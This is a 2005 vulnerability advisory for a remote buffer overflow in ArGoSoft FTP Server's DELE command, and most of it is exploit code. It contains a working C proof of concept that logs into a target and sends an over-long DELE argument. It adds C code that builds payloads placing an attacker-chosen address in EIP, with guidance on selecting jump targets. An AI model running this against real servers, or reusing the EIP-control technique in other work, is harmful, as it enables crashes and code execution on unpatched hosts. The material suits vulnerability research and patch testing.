ArGoSoft FTP Server Buffer Overflow Exploit (DELE)
Source: c0d3rz_team@yahoo.com  Author: c0d3r  Published: 2005-04-07


Summary
ArGoSoft FTP Server is "a lightweight FTP Server for Microsoft Windows platforms".

ArGoSoft FTP Server contains a remote buffer overflow in its handling of the DELE (delete) command: an over-long file name argument overwrites the saved return address (EIP) and may allow execution of arbitrary machine code. The exploit below is a proof of concept for this vulnerability. DELE is only accepted after authentication, so the PoC needs a valid user name and password; it logs in, sends the over-long DELE argument and demonstrates the overflow rather than delivering a payload.

Credit:
The information has been provided by c0d3r.
Buffer Overflow in ArGoSoft FTP (DELE)

Details
Vulnerable Systems:
* ArGoSoft FTP Server versions 1.4.2.29 and prior

Exploit:
/*
ArGoSoft FTP Server remote overflow exploit
author  : c0d3r "kaveh razavi" c0d3rz_team@yahoo.com c0d3r@ihsteam.com
package : ArGoSoft 1.4.2.29 and prior
advisory: packetstormsecurity.nl/0503-advisories/argosoftFTP1428.txt
company address : argosoft.com

The bug was found by a mate and reported to ArGoSoft, and they released
another version. I downloaded the patched version at www.argosoft.com
and started to test the server. I saw that they had worked on the vuln,
but they did not solve the mentioned DELE overflow. He did a wise job:
for every long string sent to the server it writes a null byte in the
middle, so we cannot overwrite EIP or the other registers normally. EIP
gets overwritten with something like 00410041, which seems useless. The
server will not crash, but it shows that it has been overflowed. But the
program maker does not think there are people who can do a wiser job!
Well, there is a way to get a shell; I just mention it. The code below
only shows that the server is vulnerable. We can overwrite EIP with a
null byte without sending a null!!! So if there is a jmp/call/pop/push
register instruction around 004400E1 (for example), we can jmp directly
to anywhere we want. Anyway, if you want, you can try.
compiled with visual c++ 6 : cl argo.c
greetz : LorD and NT of IHSTeam, Jamie of exploitdev, simorgh-ev, PiShi, redhat,
sIiiS and vahid, str0k (milw0rm), roberto (zone-h), securiteam, and other friends.
Congratulations to the new Iranian IRC server irc.iraneman.org #iran #ihs
and the new site www.ihsteam.com
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")

#define size 290 /* enough for overflowing; play with it for more results */

int main(int argc, char *argv[])
{
    char *recvbuf, *user, *pass;
    int rc;
    unsigned long addr = INADDR_NONE;
    SOCKET sock;                 /* socket() returns a SOCKET, not an int */
    struct sockaddr_in tcp;
    struct hostent *hp;
    WSADATA wsaData;
    char buffer[size];
    unsigned short port;
    int i;

    if (argc < 5) {
        printf("\n-------- ArGoSoft Ftp remote exploit by c0d3r --------\n");
        printf("-------- usage : argo.exe host port user pass --------\n");
        printf("-------- eg: argo.exe 127.0.0.1 21 c0d3r secret --------\n\n");
        exit(-1);
    }
    printf("\n-------- ArGoSoft Ftp remote exploit by c0d3r --------\n\n");
    recvbuf = malloc(256);
    memset(recvbuf, 0, 256);

    /* Creating exploit code: "DELE " followed by 281 'A' bytes and the
       CRLF that terminates an FTP command. The buffer is zeroed first so
       the string stays NUL-terminated for strlen(). */
    printf("[+] building overflow string\n");
    memset(buffer, 0, size);

    buffer[0] = 'D'; buffer[1] = 'E'; buffer[2] = 'L'; buffer[3] = 'E'; buffer[4] = ' ';
    for (i = 5; i < 286; i++) {
        buffer[i] = 'A';
    }
    buffer[286] = '\r';
    buffer[287] = '\n';
    /* EO exploit code */

    user = malloc(256);
    memset(user, 0, 256);

    pass = malloc(256);
    memset(pass, 0, 256);

    /* bounded formatting: argv[3]/argv[4] are attacker-controlled lengths */
    _snprintf(user, 255, "user %s\r\n", argv[3]);
    _snprintf(pass, 255, "pass %s\r\n", argv[4]);

    if (WSAStartup(MAKEWORD(2, 1), &wsaData) != 0) {
        printf("[-] WSAStartup failed !\n");
        exit(-1);
    }
    hp = gethostbyname(argv[1]);
    if (!hp) {
        addr = inet_addr(argv[1]);
    }
    if ((!hp) && (addr == INADDR_NONE)) {
        printf("[-] unable to resolve %s\n", argv[1]);
        exit(-1);
    }
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) {   /* failure is INVALID_SOCKET, never 0 */
        printf("[-] socket() error...\n");
        exit(-1);
    }
    memset(&tcp, 0, sizeof(tcp));
    if (hp != NULL) {
        memcpy(&(tcp.sin_addr), hp->h_addr, hp->h_length);
        tcp.sin_family = (short)hp->h_addrtype;
    } else {
        tcp.sin_addr.s_addr = addr;
        tcp.sin_family = AF_INET;
    }
    port = (unsigned short)atoi(argv[2]);
    tcp.sin_port = htons(port);


    printf("\n[+] attacking host %s\n", argv[1]);

    Sleep(1000);

    /* report what is actually sent (286 bytes of command + CRLF) */
    printf("[+] packet size = %d byte\n", (int)strlen(buffer));

    rc = connect(sock, (struct sockaddr *)&tcp, sizeof(struct sockaddr_in));
    if (rc == 0)
    {
        Sleep(1000);
        printf("[+] connected\n");
        recv(sock, recvbuf, 255, 0);         /* read and discard the 220 banner */
        printf("[+] sending username\n");
        send(sock, user, (int)strlen(user), 0);
        printf("[+] sending password\n");
        Sleep(1000);
        send(sock, pass, (int)strlen(pass), 0);
        Sleep(1000);
        send(sock, buffer, (int)strlen(buffer), 0);
        printf("[+] string sent successfully, check the main window for result\n");
    }

    else {
        printf("[-] ArGo is not listening .... \n");
    }
    shutdown(sock, 1);
    closesocket(sock);
    WSACleanup();

    return 0;
}
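The header comment explains why a run of 'A' bytes lands in EIP as 00410041 and why a chosen two-byte pair can still yield a usable address such as 004400E1 without any null byte being sent. The following is an added example, not c0d3r's code and not ArGoSoft's: it models that behaviour offline. It assumes (as stated in the comments) that the server widens each received byte to a two-byte little-endian unit with a zero high byte, which is the identity ANSI-to-UTF-16LE mapping for ASCII and, under a CP1252/Latin-1 code page, for 0xA0 to 0xFF (0x80 to 0x9F depend on the code page and are treated as unreachable), and that the widened argument is copied into a fixed buffer with the saved return address at an assumed offset. The address 0x004400E1 is the header's hypothetical example, not a known location in ArGoSoft; the offset 200 and the 'A' counts are constructed test values.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumption, modelled on the header comment (not ArGoSoft's real code):
   every received byte b becomes the 16-bit unit (b, 0x00). Returns the
   number of bytes written to out. */
size_t wide_expand(const unsigned char *in, size_t inlen,
                   unsigned char *out, size_t outcap)
{
    size_t i, n = 0;
    for (i = 0; i < inlen && n + 2 <= outcap; i++) {
        out[n++] = in[i];
        out[n++] = 0x00;
    }
    return n;
}

/* A byte survives the widening unchanged if it is ASCII (0x01..0x7F) or in
   the Latin-1 range 0xA0..0xFF. 0x00 cannot be sent (it would end the
   argument) and 0x80..0x9F are code-page dependent, so both are excluded. */
int byte_identity_mapped(unsigned b)
{
    return (b >= 0x01 && b <= 0x7F) || (b >= 0xA0 && b <= 0xFF);
}

/* An address can be produced from two sent bytes iff it has the shape
   0x00HH00LL with HH and LL both identity mapped. */
int unicode_safe_addr(uint32_t addr)
{
    unsigned lo = addr & 0xFFu, hi = (addr >> 16) & 0xFFu;
    if ((addr & 0xFF00FF00u) != 0) return 0;
    return byte_identity_mapped(lo) && byte_identity_mapped(hi);
}

/* Builds "DELE " + pad bytes of 'A' + the two bytes that widen to addr
   + CRLF. Returns the payload length, or 0 if addr is unreachable or the
   destination is too small. */
size_t build_dele_payload(uint32_t addr, size_t pad, unsigned char *out, size_t cap)
{
    size_t n;
    if (!unicode_safe_addr(addr) || cap < 5 + pad + 2 + 2) return 0;
    memcpy(out, "DELE ", 5); n = 5;
    memset(out + n, 'A', pad); n += pad;
    out[n++] = (unsigned char)(addr & 0xFFu);          /* widens to LL 00 */
    out[n++] = (unsigned char)((addr >> 16) & 0xFFu);  /* widens to HH 00 */
    out[n++] = '\r'; out[n++] = '\n';
    return n;
}

/* Simulates the overflow: the argument after "DELE " (CRLF stripped) is
   widened and copied into a buffer whose saved return address sits at
   ret_off (an assumed offset). Returns the little-endian value that would
   land in EIP, or 0 if the copy does not reach that far. */
uint32_t eip_after_expand(const unsigned char *payload, size_t len, size_t ret_off)
{
    unsigned char wide[4096];
    size_t arg_len, wlen;
    if (len < 7 || memcmp(payload, "DELE ", 5) != 0) return 0;
    arg_len = len - 5 - 2;
    wlen = wide_expand(payload + 5, arg_len, wide, sizeof wide);
    if (wlen < ret_off + 4) return 0;
    return (uint32_t)wide[ret_off]
         | (uint32_t)wide[ret_off + 1] << 8
         | (uint32_t)wide[ret_off + 2] << 16
         | (uint32_t)wide[ret_off + 3] << 24;
}

/* Payload for addr with pad 'A' bytes; the return address is then at widened
   offset 2 * pad. Returns the predicted EIP, 0 if addr is unreachable. */
uint32_t predicted_eip(uint32_t addr, size_t pad)
{
    unsigned char p[512];
    size_t n = build_dele_payload(addr, pad, p, sizeof p);
    return n ? eip_after_expand(p, n, 2 * pad) : 0;
}

/* The PoC's own payload: 281 'A' bytes, return address assumed at offset 200. */
uint32_t all_a_eip(void)
{
    unsigned char p[288];
    memcpy(p, "DELE ", 5); memset(p + 5, 'A', 281); p[286] = '\r'; p[287] = '\n';
    return eip_after_expand(p, sizeof p, 200);
}

int main(void)
{
    printf("all-A payload   -> EIP 0x%08X\n", all_a_eip());                   /* 0x00410041 */
    printf("E1 44 pair      -> EIP 0x%08X\n", predicted_eip(0x004400E1u, 100)); /* 0x004400E1 */
    printf("0x12345678 safe -> %d\n", unicode_safe_addr(0x12345678u));         /* 0 */
    return 0;
}
```

The practical check this gives a tester is `unicode_safe_addr()`: a candidate jmp/call target is usable under this widening only if its second and fourth bytes are zero and the other two survive the code-page conversion, which is why the header's example is written as 004400E1 rather than a typical 7Cxxxxxx DLL address.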


